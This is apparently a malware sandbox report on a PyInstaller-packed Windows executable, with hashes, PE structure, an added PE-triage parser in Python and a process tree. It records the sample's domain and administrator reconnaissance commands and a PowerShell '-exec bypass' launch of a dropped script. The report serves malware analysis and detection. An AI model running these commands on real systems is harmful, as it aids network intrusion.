General Info

File name

6_URL_ii.exe

Full analysis
https://app.any.run/tasks/984b2407-aeb0-4402-a1df-316079fe768a
Verdict
Malicious activity
Analysis date
3/14/2019, 10:27:19
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

evasion

Indicators:

MIME:
application/x-dosexec
File info:
PE32 executable (console) Intel 80386, for MS Windows
MD5

21e49843502325b063b4d52e8c297f79

SHA1

64c034034e675b89295c7de91f9c754d5880ff01

SHA256

69ff04aa3967dd2747e33cd97e7517026d49eaf13340774b6a0d5d7fd95ac35f

SSDEEP

196608:kLVzgNyHgd0zCZNulPKQ8hY/Bkr/fgIT/+Vdl7FKaz:EDgGzuN/HYOcIT/EXF9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is, for the user's information. ANY.RUN does not guarantee the maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS / SUSPICIOUS / INFO
Loads dropped or rewritten executable
  • WMIC.exe (PID: 2568)
  • 6_URL_ii.exe (PID: 4068)
Starts NET.EXE to view/change users group
  • cmd.exe (PID: 3832)
  • cmd.exe (PID: 3220)
Uses IPCONFIG.EXE to discover IP address
  • cmd.exe (PID: 2368)
  • 6_URL_ii.exe (PID: 4068)
Connects to unusual port
  • 6_URL_ii.exe (PID: 4068)
Creates files in the user directory
  • powershell.exe (PID: 2584)
Executes PowerShell scripts
  • 6_URL_ii.exe (PID: 4068)
Uses NETSTAT.EXE to discover network connections
  • 6_URL_ii.exe (PID: 4068)
Starts CMD.EXE for commands execution
  • 6_URL_ii.exe (PID: 4068)
Executable content was dropped or overwritten
  • 6_URL_ii.exe (PID: 3120)
Loads Python modules
  • 6_URL_ii.exe (PID: 4068)

No info indicators.

Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report.

Static information

TRiD (heuristic file-type guesses; the PE header below is authoritative: PE32, i386, console subsystem)
  .exe | Win64 Executable (generic) (64.6%)
  .dll | Win32 Dynamic Link Library (generic) (15.4%)
  .exe | Win32 Executable (generic) (10.5%)
  .exe | Generic Win/DOS Executable (4.6%)
  .exe | DOS Executable Generic (4.6%)
EXIF
EXE
MachineType:
Intel 386 or later, and compatibles
TimeStamp:
2018:09:04 16:42:13+02:00
PEType:
PE32
LinkerVersion:
14
CodeSize:
128000
InitializedDataSize:
172032
UninitializedDataSize:
null
EntryPoint:
0x779a
OSVersion:
5.1
ImageVersion:
null
SubsystemVersion:
5.1
Subsystem:
Windows command line
Summary
Architecture:
IMAGE_FILE_MACHINE_I386
Subsystem:
IMAGE_SUBSYSTEM_WINDOWS_CUI
Compilation Date:
04-Sep-2018 14:42:13
DOS Header
Magic number:
MZ
Bytes on last page of file:
0x0090
Pages in file:
0x0003
Relocations:
0x0000
Size of header:
0x0004
Min extra paragraphs:
0x0000
Max extra paragraphs:
0xFFFF
Initial SS value:
0x0000
Initial SP value:
0x00B8
Checksum:
0x0000
Initial IP value:
0x0000
Initial CS value:
0x0000
Overlay number:
0x0000
OEM identifier:
0x0000
OEM information:
0x0000
Address of NE header:
0x00000108
PE Headers
Signature:
PE
Machine:
IMAGE_FILE_MACHINE_I386
Number of sections:
6
Time date stamp:
04-Sep-2018 14:42:13
Pointer to Symbol Table:
0x00000000
Number of symbols:
0
Size of Optional Header:
0x00E0
Characteristics
IMAGE_FILE_32BIT_MACHINE
IMAGE_FILE_EXECUTABLE_IMAGE
IMAGE_FILE_LARGE_ADDRESS_AWARE
Sections
Name Virtual Address Virtual Size Raw Size Characteristics Entropy
.text 0x00001000 0x0001F224 0x0001F400 IMAGE_SCN_CNT_CODE,IMAGE_SCN_MEM_EXECUTE,IMAGE_SCN_MEM_READ 6.65269
.rdata 0x00021000 0x0000B0EC 0x0000B200 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 6.10091
.data 0x0002D000 0x0000E680 0x00000A00 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 1.94098
.gfids 0x0003C000 0x000000B8 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 1.89006
.rsrc 0x0003D000 0x0000EA38 0x0000EC00 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 7.29706
.reloc 0x0004C000 0x000017B8 0x00001800 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_DISCARDABLE,IMAGE_SCN_MEM_READ 6.65088
Resources (IDs; contents not shown in this extract): 1, 2, 3, 4, 5, 6, 7, 101
Imports
    KERNEL32.dll

    WS2_32.dll

Exports

    No exports.
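
The static fields above already hint at what the dynamic side confirms. Six sections account for under 300 KB of raw data, yet ssdeep chose a block size of 196608, which it only does for inputs larger than roughly 6 MB, so almost all of the file sits in an overlay after the last section. At runtime PID 3120 writes python27.dll and a dozen .pyd modules into `%TEMP%\_MEI31202` (PyInstaller's bootloader names its extraction directory `_MEI` followed by its own PID and a counter) and then re-launches itself as PID 4068, which is PyInstaller's one-file startup sequence. The block below is an added example, not code from the report or from ANY.RUN: a dependency-free parser for the PE section table that reproduces the per-section entropy column, measures the overlay, and looks for the cookie PyInstaller's bootloader places at the end of its archive. The `MEI\x0c\x0b\x0a\x0b\x0e` magic and the `!8sIIii64s` cookie layout are PyInstaller's own; the image returned by `build_sample_pe()` is constructed for the test and is not 6_URL_ii.exe.

```python
import math
import struct
from datetime import datetime, timezone

# PyInstaller's archive cookie: magic, package length, TOC offset, TOC length, Python version,
# and (PyInstaller >= 2.1) the bundled Python DLL name, as defined in PyInstaller's own reader.
PYI_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
PYI_COOKIE = struct.Struct("!8sIIii64s")

SECTION_FLAGS = {  # IMAGE_SCN_* bits from winnt.h
    0x00000020: "IMAGE_SCN_CNT_CODE", 0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA", 0x02000000: "IMAGE_SCN_MEM_DISCARDABLE",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE", 0x40000000: "IMAGE_SCN_MEM_READ", 0x80000000: "IMAGE_SCN_MEM_WRITE",
}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte (0.0..8.0), the measure shown in the report's section table."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pyinstaller_cookie(overlay: bytes):
    """Find the cookie the PyInstaller bootloader writes at the end of its archive, if any."""
    pos = overlay.rfind(PYI_MAGIC)
    if pos < 0 or pos + PYI_COOKIE.size > len(overlay):
        return None
    _, pkg_len, toc_pos, toc_len, pyvers, pylib = PYI_COOKIE.unpack_from(overlay, pos)
    major, minor = divmod(pyvers, 100) if pyvers >= 100 else divmod(pyvers, 10)  # 27 -> 2.7, 308 -> 3.8
    return {"python": f"{major}.{minor}", "pylib": pylib.rstrip(b"\0").decode("ascii", "replace"),
            "package_len": pkg_len, "toc_pos": toc_pos, "toc_len": toc_len}


def parse_pe(data: bytes) -> dict:
    """COFF header + section table, per-section entropy, overlay size, PyInstaller cookie."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    magic = struct.unpack_from("<H", data, coff + 20)[0]      # first field of the optional header
    sections, end_of_sections = [], 0
    for i in range(nsections):
        off = coff + 20 + opt_size + i * 40                  # section headers follow the optional header
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", data, off)
        raw = data[rawptr:rawptr + rawsize]
        end_of_sections = max(end_of_sections, rawptr + rawsize)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_address": vaddr, "virtual_size": vsize, "raw_size": rawsize,
                         "characteristics": [n for f, n in sorted(SECTION_FLAGS.items()) if chars & f],
                         "entropy": round(shannon_entropy(raw), 5)})
    overlay = data[end_of_sections:]                          # anything after the last section's raw data
    return {"machine": {0x14C: "IMAGE_FILE_MACHINE_I386", 0x8664: "IMAGE_FILE_MACHINE_AMD64"}.get(machine, hex(machine)),
            "pe_type": {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, hex(magic)),
            "compiled": datetime.fromtimestamp(stamp, timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
            "sections": sections, "overlay_size": len(overlay),
            "pyinstaller": parse_pyinstaller_cookie(overlay)}


def triage(data: bytes) -> dict:
    """The packer-oriented checks an analyst runs first on a sample like this one."""
    pe = parse_pe(data)
    return {"high_entropy_sections": [s["name"] for s in pe["sections"] if s["entropy"] >= 7.0],
            "writable_code": [s["name"] for s in pe["sections"] if "IMAGE_SCN_CNT_CODE" in s["characteristics"]
                              and "IMAGE_SCN_MEM_WRITE" in s["characteristics"]],
            "overlay_size": pe["overlay_size"], "pyinstaller": pe["pyinstaller"]}


def build_sample_pe() -> bytes:
    """Constructed test image (not 6_URL_ii.exe): two sections plus a PyInstaller-style overlay."""
    text = b"\x55\x8b\xec\xc3" * 128    # four equiprobable bytes -> entropy exactly 2.0
    rsrc = bytes(range(256)) * 4        # uniform bytes -> entropy exactly 8.0
    payload = b"\x00" * 200
    cookie = PYI_COOKIE.pack(PYI_MAGIC, len(payload) + PYI_COOKIE.size, 0, len(payload), 27, b"python27.dll")
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                                          # e_lfanew -> 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 1536072133, 0, 0, 0xE0, 0x0102)       # stamp: 2018-09-04 14:42:13 UTC
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                                            # PE32 magic

    def section(name, vsize, vaddr, rawsize, rawptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, chars)

    img = bytes(dos) + b"PE\0\0" + coff + bytes(opt)
    img += section(b".text", 0x1E0, 0x1000, len(text), 0x200, 0x60000020)   # CODE|EXECUTE|READ
    img += section(b".rsrc", 0x400, 0x2000, len(rsrc), 0x400, 0x40000040)   # INITIALIZED_DATA|READ
    return img + b"\0" * (0x200 - len(img)) + text + rsrc + payload + cookie


if __name__ == "__main__":
    print(triage(build_sample_pe()))
```

Run `triage(open(path, "rb").read())` on a real file. For a PyInstaller one-file binary expect a large `overlay_size` and a non-`None` `pyinstaller` entry, after which pyinstxtractor or PyInstaller's own `pyi-archive_viewer` will unpack the archive; the `.pyd` names dropped into `_MEI31202` here (pymssql's `_mssql.pyd`, PyCrypto's MD4, DES, DES3 and ARC4 modules, pywin32) tell you which third-party packages to expect inside.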

Processes

Total processes
46
Monitored processes
15
Malicious processes
2
Suspicious processes
0

Behavior graph

Process tree as drawn in the graph ("no specs" on a node means it carries none of the special indicators; PIDs are taken from the Process information section, which names each parent only by image, and the Behavior activities attribute the cmd.exe, PowerShell, ipconfig and netstat launches to PID 4068):

6_url_ii.exe (PID 3120)
  6_url_ii.exe (PID 4068)
    cmd.exe (PID 2356, no specs)
      wmic.exe (PID 2568, no specs)
    cmd.exe (PID 3832, no specs)
      net.exe (PID 4044, no specs)
        net1.exe (PID 2468, no specs)
    cmd.exe (PID 3220, no specs)
      net.exe (PID 3428, no specs)
        net1.exe (PID 3744, no specs)
    powershell.exe (PID 2584, no specs)
    cmd.exe (PID 2368, no specs)
      ipconfig.exe (PID 2556, no specs)
    ipconfig.exe (PID 3548, no specs)
    netstat.exe (PID 2232, no specs)

Process information

PID
3120
CMD
"C:\Users\admin\AppData\Local\Temp\6_URL_ii.exe"
Path
C:\Users\admin\AppData\Local\Temp\6_URL_ii.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version: none reported (no Company / Description / Version strings)
Modules
Image
c:\users\admin\appdata\local\temp\6_url_ii.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\apphelp.dll

PID
4068
CMD
"C:\Users\admin\AppData\Local\Temp\6_URL_ii.exe"
Path
C:\Users\admin\AppData\Local\Temp\6_URL_ii.exe
Indicators
Parent process
6_URL_ii.exe
User
admin
Integrity Level
MEDIUM
Version: none reported (no Company / Description / Version strings)
Modules
Image
c:\users\admin\appdata\local\temp\6_url_ii.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\users\admin\appdata\local\temp\_mei31202\python27.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\users\admin\appdata\local\temp\_mei31~1\_ctypes.pyd
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll
c:\users\admin\appdata\local\temp\_mei31~1\_multiprocessing.pyd
c:\users\admin\appdata\local\temp\_mei31~1\_hashlib.pyd
c:\users\admin\appdata\local\temp\_mei31~1\_socket.pyd
c:\users\admin\appdata\local\temp\_mei31~1\_ssl.pyd
c:\users\admin\appdata\local\temp\_mei31~1\win32event.pyd
c:\users\admin\appdata\local\temp\_mei31~1\pywintypes27.dll
c:\users\admin\appdata\local\temp\_mei31~1\win32api.pyd
c:\windows\system32\version.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\users\admin\appdata\local\temp\_mei31~1\_mssql.pyd
c:\users\admin\appdata\local\temp\_mei31~1\msvcr90.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\users\admin\appdata\local\temp\_mei31~1\select.pyd
c:\windows\system32\wsock32.dll
c:\users\admin\appdata\local\temp\_mei31~1\crypto.cipher._arc4.pyd
c:\users\admin\appdata\local\temp\_mei31~1\crypto.cipher._des.pyd
c:\users\admin\appdata\local\temp\_mei31~1\crypto.hash._md4.pyd
c:\users\admin\appdata\local\temp\_mei31~1\crypto.util.strxor.pyd
c:\users\admin\appdata\local\temp\_mei31~1\crypto.cipher._aes.pyd
c:\users\admin\appdata\local\temp\_mei31~1\crypto.cipher._des3.pyd
c:\users\admin\appdata\local\temp\_mei31~1\bz2.pyd
c:\windows\system32\apphelp.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\netstat.exe

PID
2356
CMD
cmd /c wmic ntdomain get domainname
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
6_URL_ii.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wbem\wmic.exe

PID
2568
CMD
wmic ntdomain get domainname
Path
C:\Windows\System32\Wbem\WMIC.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wbem\xml\wmi2xml.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\sxs.dll

PID
3832
CMD
cmd /c net localgroup administrators
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
6_URL_ii.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\net.exe

PID
4044
CMD
net localgroup administrators
Path
C:\Windows\system32\net.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Net Command
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\net.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\mpr.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\net1.exe

PID
2468
CMD
C:\Windows\system32\net1 localgroup administrators
Path
C:\Windows\system32\net1.exe
Indicators
No indicators
Parent process
net.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Net Command
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\net1.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dsrole.dll
c:\windows\system32\netutils.dll
c:\windows\system32\logoncli.dll
c:\windows\system32\browcli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\samlib.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\netmsg.dll

PID
3220
CMD
cmd /c net group "domain admins" /domain
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
6_URL_ii.exe
User
admin
Integrity Level
MEDIUM
Exit code
2
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
3428
CMD
net group "domain admins" /domain
Path
C:\Windows\system32\net.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
2
Version:
Company
Microsoft Corporation
Description
Net Command
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\net.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\mpr.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\apphelp.dll

PID
3744
CMD
C:\Windows\system32\net1 group "domain admins" /domain
Path
C:\Windows\system32\net1.exe
Indicators
No indicators
Parent process
net.exe
User
admin
Integrity Level
MEDIUM
Exit code
2
Version:
Company
Microsoft Corporation
Description
Net Command
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\net1.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dsrole.dll
c:\windows\system32\netutils.dll
c:\windows\system32\logoncli.dll
c:\windows\system32\browcli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\samlib.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\netmsg.dll

PID
2584
CMD
powershell.exe -exec bypass "import-module C:\Users\admin\AppData\Local\Temp\m2.ps1"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
6_URL_ii.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
